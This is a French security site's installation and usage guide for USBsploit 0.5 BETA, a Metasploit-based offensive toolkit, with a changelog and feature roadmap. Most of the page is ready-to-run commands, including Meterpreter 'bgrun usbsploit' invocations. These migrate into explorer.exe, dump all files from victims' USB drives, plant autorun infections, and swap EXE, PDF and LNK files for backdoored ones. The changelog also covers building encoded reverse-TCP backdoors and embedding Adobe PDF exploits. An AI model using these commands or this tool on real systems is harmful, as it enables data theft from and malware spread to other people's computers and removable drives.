How to install USBsploit 0.5 BETA through SVN, the tar.gz, the .run or to work with original Metasploit

Par Xavier Poli, secuobs.com
Le 14//2010

---

Résumé : PoC to generate Reverse TCP backdoors, malicious PDF or LNK files. But also running Auto[run|play] infections and dumping all USB files remotely on multiple targets at the same time, a set of extensions to dump can be specified. All EXE, PDF and LNK on the USB targets can also be replaced by malicious ones. USBsploit works through Meterpreter sessions (wmic, railgun, migration) with a light modified version of Metasploit. The interface is a mod of SET (The Social Engineering Toolkit). The Meterscript scripts of the USBsploit Framework can also be used with the original Metasploit Framework. - Lire l'article



The most recent version of USBsploit is actually the 0.6 BETA

Reports the bugs to https://twitter.com/secuobs or xavier.poli@infratech.fr (recommanded for privacy issues), KeyID: 0x3A3D555A, FingerPrint: 04B1 244C CC25 DA93 EB73 EF52 E278 881F 3A3D 555A, xpo.asc

The usbsploit.rb script seems to have some issues if used with the default Ruby version of Backtrack 4, installing a 1.9.1 version will fixed. The details to give in the bugs reports: the version of Python, the version of Ruby, the version of Metasploit if used, the OS of the targets, the OS of the listener, the hardware details for both the targets and the listener but also for the USB drives, the security solutions installed on both the targets and the listener, the particular firewall configuration on both the target and the listener, the version of VMware or others if used, the last file for the Dump configuration, the stage where the bug was identified, the global USBsploit options if changed, the output of the high verbosity scan, the output of USBsploit

To use USBsploit, you certainly need the same dependencies ( link ) as the Metasploit Framework and SET.

Installation 0.5 BETA through SVN ( lien )

root:~# svn -q co https://svn.secuobs.com/svn
Erreur de validation du certificat du serveur pour 'https://svn.secuobs.com:443':
- Le certificat n'est pas signé pas une autorité de confiance.
Valider le certificat manuellement !
Informations du certificat :
- nom d'hôte : svn.secuobs.com
- valide de Fri, 09 Jul 2010 15:00:30 GMT à Mon, 06 Jul 2020 15:00:30 GMT
- signataire : XPO, SECUOBS, PARIS, IDF, FR
- empreinte : 80:44:9d:01:ac:6e:69:65:2a:7f:2a:ec:46:c0:a6:6e:d4:16:5a:8e
(R)ejet, acceptation (t)emporaire ou (p)ermanente ? p
root:~# cd svn/
root:~/svn# ./installer.sh
Type usbsploit to launch the USBsploit Framework
root:~/svn# cd ../
root:~# rm -fr svn
root:~# usbsploit


Installation through usbsploit-0.5-BETA-linux-i686.run ( lien )

root:~# wget https://www.secuobs.com/usbsploit/usbsploit-0.5-BETA-linux-i686.run
root:~# sha1sum usbsploit-0.5-BETA-linux-i686.run
614c321553a4de2bc7843aafa4ce926b232595ef usbsploit-0.5-BETA-linux-i686.run
root:~# sh usbsploit-0.5-BETA-linux-i686.run
Type usbsploit to launch the USBsploit Framework
root:~# rm -fr usbsploit
root:~# usbsploit
The USBsploit Framework 0.5 BETA
Report bugs to: xavier.poli.fr
Or: http://www.twitter.com/secuobs
Homepage: http://www.secuobs.com
Based on modified versions of:
- Metasploit (original from HDM)
- SET (original from ReL1K)

It's the first launch, an update will be performend for the USBsploit Framework, be patient...
Erreur de validation du certificat du serveur pour 'https://svn.secuobs.com:443':
- Le certificat n'est pas signé pas une autorité de confiance.
Valider le certificat manuellement !
Informations du certificat :
- nom d'hôte : svn.secuobs.com
- valide de Fri, 09 Jul 2010 15:00:30 GMT à Mon, 06 Jul 2020 15:00:30 GMT

- signataire : XPO, SECUOBS, PARIS, IDF, FR
- empreinte : 80:44:9d:01:ac:6e:69:65:2a:7f:2a:ec:46:c0:a6:6e:d4:16:5a:8e
(R)ejet, acceptation (t)emporaire ou (p)ermanente ? p


Installation through usbsploit-0.5-BETA-linux-i686.tar.gz ( lien )

root:~# wget https://www.secuobs.com/usbsploit/usbsploit-0.5-BETA-linux-i686.tar.gz
root:~# sha1sum usbsploit-0.5-BETA-linux-i686.tar.gz
6ea0c951282775a6eb764333a3c95ae94bba5c71 usbsploit-0.5-BETA-linux-i686.tar.gz
root:~# tar zxvf usbsploit-0.5-BETA-linux-i686.tar.gz
root:~# cd usbsploit
root:~/usbsploit# ./installer.sh
Type usbsploit to launch the USBsploit Framework
root:~/usbsploit# cd ../
root:~# rm -fr usbsploit/
root:~# usbsploit
The USBsploit Framework 0.5 BETA
Report bugs to: xavier.poli.fr
Or: http://www.twitter.com/secuobs
Homepage: http://www.secuobs.com
Based on modified versions of:
- Metasploit (original from HDM)
- SET (original from ReL1K)

It's the first launch, an update will be performend for the USBsploit Framework, be patient...
Erreur de validation du certificat du serveur pour 'https://svn.secuobs.com:443':
- Le certificat n'est pas signé pas une autorité de confiance.
Valider le certificat manuellement !
Informations du certificat :
- nom d'hôte : svn.secuobs.com
- valide de Fri, 09 Jul 2010 15:00:30 GMT à Mon, 06 Jul 2020 15:00:30 GMT
- signataire : XPO, SECUOBS, PARIS, IDF, FR
- empreinte : 80:44:9d:01:ac:6e:69:65:2a:7f:2a:ec:46:c0:a6:6e:d4:16:5a:8e
(R)ejet, acceptation (t)emporaire ou (p)ermanente ? p


Installation usbsploit.rb 0.5 BETA working with the original Metasploit Framework ( lien )

root:~# wget https://www.secuobs.com/usbsploit/usbsploit-0.5-BETA-linux-i686.tar.gz
root:~# sha1sum usbsploit-0.5-BETA-linux-i686.tar.gz
6ea0c951282775a6eb764333a3c95ae94bba5c71 usbsploit-0.5-BETA-linux-i686.tar.gz
root:~# tar zxvf usbsploit-0.5-BETA-linux-i686.tar.gz
root:~# mv usbsploit/lib/msf/scripts/meterpreter/usbsploit.rb /opt/metasploit3/msf3/scripts/meterpreter/
root:~# mv usbsploit/lib/msf/data/textextensions /opt/metasploit3/msf3/data/
root:~# rm -fr usbsploit/
root:~# msfconsole -n

When you have a Meterpreter session:

- Get some help

meterpreter > bgrun usbsploit -h

- Always using Railgun, even if wmic is available on the target. Launch a Dump attack on all files with high verbosity during an infinite loop. Migrate to explorer.exe

meterpreter > bgrun usbsploit -s explorer.exe -q -c -v -d

- Always using Railgun, even if wmic is available on the target. Launch a Dump attack only on files matching the predefined set of extensions with high verbosity during an infinite loop. Migrate to explorer.exe

meterpreter > bgrun usbsploit -s explorer.exe -q -c -v -e /opt/metasploit3/msf3/data/textextensions -t

- Always using Railgun, even if wmic is available on the target. Launch an Auto[run|play]/EXE USB infection attack with high verbosity during an infinite loop. Migrate to explorer.exe

meterpreter > bgrun usbsploit -s explorer.exe -q -c -v -i /opt/usbsploit/lib/msf/data/autorun.inf -n usbsploitbackdoor.exe -b /opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe -j /opt/usbsploit/lib/msf/data/autorun.ico -a

- Always using Railgun, even if wmic is available on the target. Launch both Auto[run|play]/EXE USB infection and all file dumping attacks with high verbosity during an infinite loop. Migrate to explorer.exe

meterpreter > bgrun usbsploit -s explorer.exe -q -c -v -i /opt/usbsploit/lib/msf/data/autorun.inf -n usbsploitbackdoor.exe -b /opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe -j /opt/usbsploit/lib/msf/data/autorun.ico -a -d

- Always using Railgun, even if wmic is available on the target. Launch both Auto[run|play]/EXE USB infection and file dumping (only on files matching the predefined set of extensions) attacks with high verbosity during an infinite loop. Migrate to explorer.exe

meterpreter > bgrun usbsploit -s explorer.exe -q -c -v -i /opt/usbsploit/lib/msf/data/autorun.inf -n usbsploitbackdoor.exe -b /opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe -j /opt/usbsploit/lib/msf/data/autorun.ico -a -e /opt/metasploit3/msf3/data/textextensions -t

- Always using Railgun, even if wmic is available on the target. Launch an Auto[run|play]/LNK USB infection attack with high verbosity during an infinite loop. Migrate to explorer.exe

meterpreter > bgrun usbsploit -s explorer.exe -q -c -v -i /opt/usbsploit/lib/msf/data/autorun.inf -j /opt/usbsploit/lib/msf/data/autorun.ico -m usbsploit.lnk -k /opt/usbsploit/lib/msf/data/usbsploit.lnk -l

- Always using Railgun, even if wmic is available on the target. Launch an Auto[run|play]/PDF USB infection attack with high verbosity during an infinite loop. Migrate to explorer.exe

meterpreter > bgrun usbsploit -s explorer.exe -q -c -v -i /opt/usbsploit/lib/msf/data/autorun.inf -j /opt/usbsploit/lib/msf/data/autorun.ico -f usbsploit.pdf -r /opt/usbsploit/lib/msf/data/usbsploit.pdf -p

- Always using Railgun, even if wmic is available on the target. Launch Auto[run|play]/EXE USB infection and all files dumping attack with high verbosity during an infinite loop. Also replaced all the EXE, PDF and LNK files available on the USB targets by malicious ones. Migrate to explorer.exe

meterpreter > bgrun usbsploit -s explorer.exe -q -c -v -i /opt/usbsploit/lib/msf/data/autorun.inf -j /opt/usbsploit/lib/msf/data/autorun.ico-n usbsploitbackdoor.exe -b /opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe -f usbsploit.pdf -r /opt/usbsploit/lib/msf/data/usbsploit.pdf -m usbsploit.lnk -k /opt/usbsploit/lib/msf/data/usbsploit.lnk -o -a -d

- Always using Railgun, even if wmic is available on the target. Launch Auto[run|play]/PDF USB infection and all files dumping attack with high verbosity during an infinite loop. Also replaced all the EXE, PDF and LNK files available on the USB targets by malicious ones. Migrate to explorer.exe

meterpreter > bgrun usbsploit -s explorer.exe -q -c -v -i /opt/usbsploit/lib/msf/data/autorun.inf -j /opt/usbsploit/lib/msf/data/autorun.ico-n usbsploitbackdoor.exe -b /opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe -f usbsploit.pdf -r /opt/usbsploit/lib/msf/data/usbsploit.pdf -m usbsploit.lnk -k /opt/usbsploit/lib/msf/data/usbsploit.lnk -o -p -d

- Always using Railgun, even if wmic is available on the target. Launch Auto[run|play]/LNK USB infection and all files attack with high verbosity during an infinite loop. Also replaced all the EXE, PDF and LNK files available on the USB targets by malicious ones. Migrate to explorer.exe

meterpreter > bgrun usbsploit -s explorer.exe -q -c -v -i /opt/usbsploit/lib/msf/data/autorun.inf -j /opt/usbsploit/lib/msf/data/autorun.ico-n usbsploitbackdoor.exe -b /opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe -f usbsploit.pdf -r /opt/usbsploit/lib/msf/data/usbsploit.pdf -m usbsploit.lnk -k /opt/usbsploit/lib/msf/data/usbsploit.lnk -o -l -d

- Always using Railgun, even if wmic is available on the target. Launch Auto[run|play]/EXE USB infection and file dumping (only on files matching the predefined set of extensions) attacks with high verbosity during an infinite loop. Also replaced all the EXE files available on the USB targets by malicious ones. Migrate to explorer.exe

meterpreter > bgrun usbsploit -s explorer.exe -q -c -v -i /opt/usbsploit/lib/msf/data/autorun.inf -j /opt/usbsploit/lib/msf/data/autorun.ico-n usbsploitbackdoor.exe -b /opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe -g -a -e /opt/metasploit3/msf3/data/textextensions -t

- Always using Railgun, even if wmic is available on the target. Launch Auto[run|play]/PDF USB infection and file dumping (only on files matching the predefined set of extensions) attacks with high verbosity during an infinite loop. Also replaced all the PDF files available on the USB targets by malicious ones. Migrate to explorer.exe

meterpreter > bgrun usbsploit -s explorer.exe -q -c -v -i /opt/usbsploit/lib/msf/data/autorun.inf -j /opt/usbsploit/lib/msf/data/autorun.ico -f usbsploit.pdf -r /opt/usbsploit/lib/msf/data/usbsploit.pdf -g -p -e /opt/metasploit3/msf3/data/textextensions -t

- Always using Railgun, even if wmic is available on the target. Launch Auto[run|play]/LNK USB infection and file dumping (only on files matching the predefined set of extensions) attacks with high verbosity during an infinite loop. Also replaced all the LNK files available on the USB targets by malicious ones. Migrate to explorer.exe

meterpreter > bgrun usbsploit -s explorer.exe -q -c -v -i /opt/usbsploit/lib/msf/data/autorun.inf -j /opt/usbsploit/lib/msf/data/autorun.ico -m usbsploit.lnk -k /opt/usbsploit/lib/msf/data/usbsploit.lnk -g -l -e /opt/metasploit3/msf3/data/textextensions -t

- Always using Railgun, even if wmic is available on the target. Launch Auto[run|play]/LNK USB infection with high verbosity during an infinite loop. Also replaced all the LNK files available on the USB targets by malicious ones. Migrate to explorer.exe

meterpreter > bgrun usbsploit -s explorer.exe -q -c -v -i /opt/usbsploit/lib/msf/data/autorun.inf -j /opt/usbsploit/lib/msf/data/autorun.ico -m usbsploit.lnk -k /opt/usbsploit/lib/msf/data/usbsploit.lnk -g -l

- Always using Railgun, even if wmic is available on the target. Launch Auto[run|play]/LNK USB infection during an infinite loop. Also replaced all the EXE, PDF and LNK files available on the USB targets by malicious ones. Migrate to explorer.exe

meterpreter > bgrun usbsploit -s explorer.exe -q -c -v -i /opt/usbsploit/lib/msf/data/autorun.inf -j /opt/usbsploit/lib/msf/data/autorun.ico -n usbsploitbackdoor.exe -b /opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe -f usbsploit.pdf -r /opt/usbsploit/lib/msf/data/usbsploit.pdf -m usbsploit.lnk -k /opt/usbsploit/lib/msf/data/usbsploit.lnk -o -l

Just removed the "-v" switch to desactivate the high verbosity and the "-c" if you want to use wmic when it is available on the target, automatically defaulting to Railgun if not. If you drop the "-s explorer.exe -q", the migration will not be activated.


Installation dump_usbsploit.rb, autorun_usbsploit.rb, replace_usbsploit.rb split 0.5 BETA working with the original Metasploit Framework ( lien )

root:~# wget https://www.secuobs.com/usbsploit/usbsploit-0.5-BETA-linux-i686.tar.gz
root:~# sha1sum usbsploit-0.5-BETA-linux-i686.tar.gz
6ea0c951282775a6eb764333a3c95ae94bba5c71 usbsploit-0.5-BETA-linux-i686.tar.gz
root:~# tar zxvf usbsploit-0.5-BETA-linux-i686.tar.gz
root:~# mv usbsploit/lib/msf/split_meterpreter_scripts/autorun_usbsploit.rb /opt/metasploit3/msf3/scripts/meterpreter/
root:~# mv usbsploit/lib/msf/split_meterpreter_scripts/dump_usbsploit.rb /opt/metasploit3/msf3/scripts/meterpreter/
root:~# mv usbsploit/lib/msf/split_meterpreter_scripts/replace_usbsploit.rb /opt/metasploit3/msf3/scripts/meterpreter/
root:~# mv usbsploit/lib/msf/data/textextensions /opt/metasploit3/msf3/data/
root:~# rm -fr usbsploit/
root:~# msfconsole -n

When you have a Meterpreter session:

- Always using Railgun, even if wmic is available on the target. Launch a Dump attack on all files with high verbosity during an infinite loop. Protect the dumped files to be replaced by malicious ones uploaded via autorun_usbsploit.rb and/or replace_usbsploit.rb . Migrate to explorer.exe

meterpreter > bgrun dump_usbsploit -s explorer.exe -q -v -c -d -n usbsploitbackdoor.exe -b /opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe -m usbsploit.lnk -k /opt/usbsploit/lib/msf/data/usbsploit.lnk -f usbsploit.pdf -r /opt/usbsploit/lib/msf/data/usbsploit.pdf -p all

- Always using Railgun, even if wmic is available on the target. Launch a Dump attack on all files with high verbosity during an infinite loop. Only protect the EXE dumped files to be replaced by malicious ones uploaded via autorun_usbsploit.rb and/or replace_usbsploit.rb. Migrate to explorer.exe

meterpreter > bgrun dump_usbsploit -s explorer.exe -q -v -c -d -n usbsploitbackdoor.exe -b /opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe -p exe

- Always using Railgun, even if wmic is available on the target. Launch Auto[run|play]/EXE USB infection during an infinite loop. Migrate to explorer.exe

meterpreter > bgrun autorun_usbsploit -s explorer.exe -q -v -c -i /opt/usbsploit/lib/msf/data/autorun.inf -j /opt/usbsploit/lib/msf/data/autorun.ico -n usbsploitbackdoor.exe -b /opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe -a exe

- Always using Railgun, even if wmic is available on the target. Launch Auto[run|play]/LNK USB infection during an infinite loop. Migrate to explorer.exe

meterpreter > bgrun autorun_usbsploit -s explorer.exe -q -v -c -i /opt/usbsploit/lib/msf/data/autorun.inf -j /opt/usbsploit/lib/msf/data/autorun.ico -n usbsploit.lnk -b /opt/usbsploit/lib/msf/data/usbsploit.lnk -a lnk

- Always using Railgun, even if wmic is available on the target. Launch Auto[run|play]/PDF USB infection during an infinite loop. Migrate to explorer.exe

meterpreter > bgrun autorun_usbsploit -s explorer.exe -q -v -c -i /opt/usbsploit/lib/msf/data/autorun.inf -j /opt/usbsploit/lib/msf/data/autorun.ico -n usbsploit.pdf -b /opt/usbsploit/lib/msf/data/usbsploit.pdf -a pdf

- Always using Railgun, even if wmic is available on the target. Replace all the EXE, PDF and LNK files available on the USB targets by malicious ones. Migrate to explorer.exe

meterpreter > bgrun replace_usbsploit -s explorer.exe -q -c -n usbsploitbackdoor.exe -b /opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe -m usbsploit.lnk -k /opt/usbsploit/lib/msf/data/usbsploit.lnk -f usbsploit.pdf -r /opt/usbsploit/lib/msf/data/usbsploit.pdf -o all

- Always using Railgun, even if wmic is available on the target. Replace all the EXE files available on the USB targets by malicious ones

meterpreter > bgrun replace_usbsploit -s explorer.exe -q -c -n usbsploitbackdoor.exe -b /opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe -o exe

Just remove the "-v" switch to desactivate the high verbosity and the "-c" if you want to use wmic when it is available on the target, automatically defaulting to Railgun if not. If you drop the "-s explorer.exe -q", the migration will not be activated.

USBsploit ressources:

- Video - USBsploit 0.6 BETA: Replace and infect all EXE and PDF with payload embedded into the orignal files
- Video - USBsploit 0.6 BETA: using autosploit CLI to automate the infection of all original EXE & PDF files
- Video - usbsploit.rb 0.6b w/ MSF: custom infection to replace all the original EXE and PDF files
- Video - usbsploit.rb 0.6b split into 3 scripts w/ MSF: custom infection to replace all original EXE and PDF
- How to install USBsploit 0.6 BETA through SVN, the tar.gz, the .run or to work with original Metasploit
- Video - USBsploit 0.5 BETA: Dump, Autorun, Migration and all EXE, PDF, LNK files replaced through Railgun against XP HOME
- Video - USBsploit 0.5 BETA: Dump, Autorun, Migration and all EXE files replaced, Railgunonly option against XP PRO
- Video - usbsploit.rb 0.5b with Metasploit: Dump, Autorun, Migration and all EXE, PDF, LNK files replaced using Railgun against XP HOME
- Video - usbsploit.rb 0.5b split into 3 scripts with Metasploit: Migration, Replacement, dump protection and Railgunonly against XP PRO
- How to install USBsploit 0.5 BETA through SVN, the tar.gz, the .run or to work with original Metasploit
- Video: USBsploit 0.4 BETA: Auto[run|play]/PDF USB infection and files dumping through Meterpreter sessions
- Video: usbsploit.rb 0.4 in Metasploit, Auto[run|play]/PDF USB infection and files durmping through Meterpreter
- How to install USBsploit v0.4b through SVN, the tar.gz, the .run or to work with the original Metasploit Framework
- Video: USBsploit 0.3 BETA: Auto[run|play]/LNK USB infection and files dumping through Meterpreter sessions
- Video: usbsploit.rb 0.3 in Metasploit, Auto[run|play]/LNK USB infection and files durmping through Meterpreter
- How to install USBsploit v0.3b through SVN, the tar.gz, the .run or to work with the original Metasploit Framework
- Video: USBsploit 0.2 BETA: Auto[run|play]/EXE USB infection through Meterpreter sessions
- Video: usbsploit.rb 0.2 and the original Metasploit Framework,Auto[run|play]/EXE USB infection through Meterpreter sessions
- Video: USBsploit 0.2 BETA: both USB files dumping and Auto[run|play]/EXE USB infection through Meterpreter sessions
- Video: usbsploit.rb 0.2 in Metasploit, both Auto[run|play]/EXE USB infection and files durmping through Meterpreter sessions
- How to install USBsploit v0.2b through SVN, the tar.gz, the .run or to work with the original Metasploit Framework
- Video: USBsploit gets all the remote USB files through Meterpreter sessions and a modified version of the original Metasploit Framework
- Video: USBsploit gets all the remote USB files filtered by extensions through Meterpreter sessions and a modified version of the original Metasploit Framework
- Video: usbsploit.rb and the original MSF to get all the remote USB files through Meterpreter sessions
- Video: usbploit.rb and the original MSF to get all the remote USB files filtered by extensions through Meterpreter sessions
- How to install USBsploit v0.1b through SVN, the tar.gz, the .run or to work with the original Metasploit Framework

Changelog:

USBsploit V0.6b:

- Add an option for the replacement module, allowing to try to upload an infected version of the original USB files first. Only for PDF and EXE files, LNK ones will always be replaced by a generic malicious one. If not succeeding to infect an embed custom version, a generic malicious one will be used to replace the EXE and PDF files. It can be use alone or with any Auto[run|play] infection but not with a single dump (all or by extension) attack. It's useful when the targets don't have Auto[run|play] activated. Can be used with USBsploit or with the original Metasploit framework via the usbsploit.rb script provided. Also supported into the 3 splited meterpreter scripts (autorun_usbsploit.rb, dump_usbsploit.rb, replace_usbsploit.rb).
- Offer a CLI to automate the creation of the malicious files and the launch of the listeners. The ip, payload, encoder, count, port, attacks, replacing, template for pdf embed and pdf type options can be specified via specific switchs on the command line. If nothing specified for an option, the default value will be used. All the different combinaisons were tested via an intenal fuzzing tools and looks to work.
- offers an internal Metasploit core updated with the last SVN version (metasploit v3.7.0-dev svn r12145 2011.03.26).

USBsploit V0.5b:

- integrates a EXE, PDF and LNK USB replacement module. It can be use alone or with any Auto[run|play] infection but not a single dump (all or by extension) attack. It's useful when the targets don't have Auto[run|play] activated.
- offers an option to use to replace only the contextual files to an Auto[run|play] USB infection. If Auto[run|play]/exe, all the EXE can be replaced, same for Auto[run|play]/pdf PDF files and Auto[run|play]/lnk LNK files.
- now using railgun with with GetLogicalDrives(), GetDriveTypeN() and GetVolumeInformationW() when vmic's not available on the targets (XP HOME).
- an option can be activated to always using railgun with with GetLogicalDrives(), GetDriveTypeN() and GetVolumeInformationW(), even when vmic's available on the targets (XP PRO).
- More than the single usbsploit.rb scripts, now offering 3 independent ruby meterpreter scripts (autorun_usbsploit.rb, dump_usbsploit.rb, replace_usbsploit.rb). Note that dump_usbsploit.rb's an option to protect the dumped files from being overwritten when trying to dump a file previously uploaded by replace_usbsploit.rb or autorun_usbsploit.rb. Every scripts can be used with the last original Metasploit Framework (all the options work with the 3.5.1-dev).
- offers an internal Metasploit core updated with the last SVN version (v3.5.1-dev svn r11223 2010.12.04).
- Add Adobe FlateDecode Stream Predictor 02 Integer Overflow to the list of MSF FileFormat attacks.
- Minor improvements and some bug fixes like when a non default value's specified for the path of the file listing the extension to dump.

USBsploit V0.4b:

- integrates a Auto[run|play]/PDF USB infection module with various attacks (Adobe CoolType SING Table 'uniqueName' Overflow, Adobe Flash Player 'newfunction' Invalid Pointer Use, Adobe Collab.collectEmailInfo Buffer Overflow, Adobe Collab.getIcon Buffer Overflow, Adobe JBIG2Decode Memory Corruption Exploit, Adobe PDF Embedded EXE Social Engineering, Adobe util.printf() Buffer Overflow, Adobe U3D CLODProgressiveMeshDeclaration Array Overrun, Adobe PDF Embedded EXE Social Engineering (NOJS)).
- offers an option to use both the Auto[run|play]/PDF USB infection and the USB files dumping attack on a same target
- offers a ruby meterpreter script (usbsploit.rb) compatible with the last original Metasploit Framework (all the options work with the 3.5.1-dev). A bug (reported to the MSF team) seems to exist with this last version of MSF (not with the previous 3.4.2-dev) when exit -y is used if you have an active session and an InitialAutorunScript was used (finished or not), you need to kill it with sessions -K before exit or exit -y. The USBsploit Framework is always based on the 3.4.2-dev for the moment to avoid this issue.

USBsploit V0.3b:

- was tested under a GNU/Linux operating system with Python 2.6.5 and ruby 1.9.1,
- integrates a Auto[run|play]/LNK USB infection module. The generation of the LNK file, the autorun.inf and the rest of the process are splitted but share some random values to work together
- offers to launch a LNK listener (different from the one handling the USB infection) to get the connect back from the USB drives infected with the last LNK file generated.
- offers also a full console with this listener, including all the Metasploit features, except the exploits, payloads, encoders and nops. You have to add manually this kind of stuffs if you want to use it (copy from a classic Metasploit installation to the lib/msf/modules in the USBsploit installation tree). You can choose to activate the database support or not on this console.
- offers an internal Metasploit core updated with the last SVN version (v3.4.2-dev)
- adds support for the French outputs of the wmic commands
- offers an option to use both the Auto[run|play]/LNK USB infection and the USB files dumping attack on a same target
- offers a ruby meterpreter script (usbsploit.rb) compatible with the last original Metasploit Framework (all the options work with the 3.4.2-dev).

USBsploit V0.2b:

- integrates the Auto[run|play]/EXE USB infection module
- offers an option to use both the Auto[run|play]/EXE infection and files dumping attack on a same target

USBsploit V0.1b:

- was tested under a GNU/Linux operating system with Python 2.6.2 and ruby 1.9.1,
- was tested against a target Microsoft Windows XP PRO SP3 running under a GNU/Linux VMware Server 2.0.2,
- needs the wmic command on the targets (Windows XP home is not a possible target),
- works against multiple targets at the same time and multiple USB keys on each target
- deals the multiple plugs and unplugs for a same key
- can be installed via SVN, ".run" or ".tar.gz" archives,
- can be managed through a Python interface (a modified version of the Social Engineering Toolkit, original by ReL1K),
- can be updated via SVN,
- allows the activation and the desactivation for auto-updates,
- allows to edit global configuration file,
- allows to generate Meterpreter Backdoors with some available options (ip for the listener, type of Backdoor, type of Encoding, port for the Listener, multiple Encoding stages) and choose if a Dump Listener will be launched,
- allows to generate Meterpreter Backdoors with the same kind of options and launching automatically a Dump Listener,
- lets choosing between 3 types of Meterpreter Backdoors available (Reverse_TCP the only one tested for now, Reverse_TCP_X64, Egress Buster),
- lets choosing between 3 types of Encoding for the Meterpreter Backdoors (shikata_ga_nai, Multi-Encoder, Backdoored EGxecutable),
- allows to dump all the files from a remote USB key through multiple Meterpreter sessions and a light version (24MB) of Metasploit (original by HDM),
- allows to dumps, from a remote USB key, all the files matching a specific set of extensions, defined through a text file,
- allows to edit the file for defining the set of extensions,
- allows to launch a Dump Listerner through the last file of Dump configuration,
- allows to edit the last file of Dump configuration,
- allows to activate the high verbose mode,
- allows to choose between only one USB Scan/Dump ending with success for each attack or an infinite loop,
- Ruby script usbsploit.rb compatible with the original Metasploit Framework (all the options work with the version 3.4.x, the anterior versions weren't tested).

The future versions of USBsploit could:

- inject a malicious VBS script into the DOC/XLS files available on the remote USB keys
- target USB U3 keys,
- integrate the ReverseConnectRetries directive for the Reverse_TCP payloads
- integrate the EnableContextEncoding and ContextInformationFile directives for the generation of payloads
- reintegrate some features of SET to spread the malicious files,
- help to build a fake malicious website alimenting a Twitter account with the items from the most popular Press RSS. Karmetasploit, Wepbuster, MITM and ARP poisonning modules could also be added
- Others ???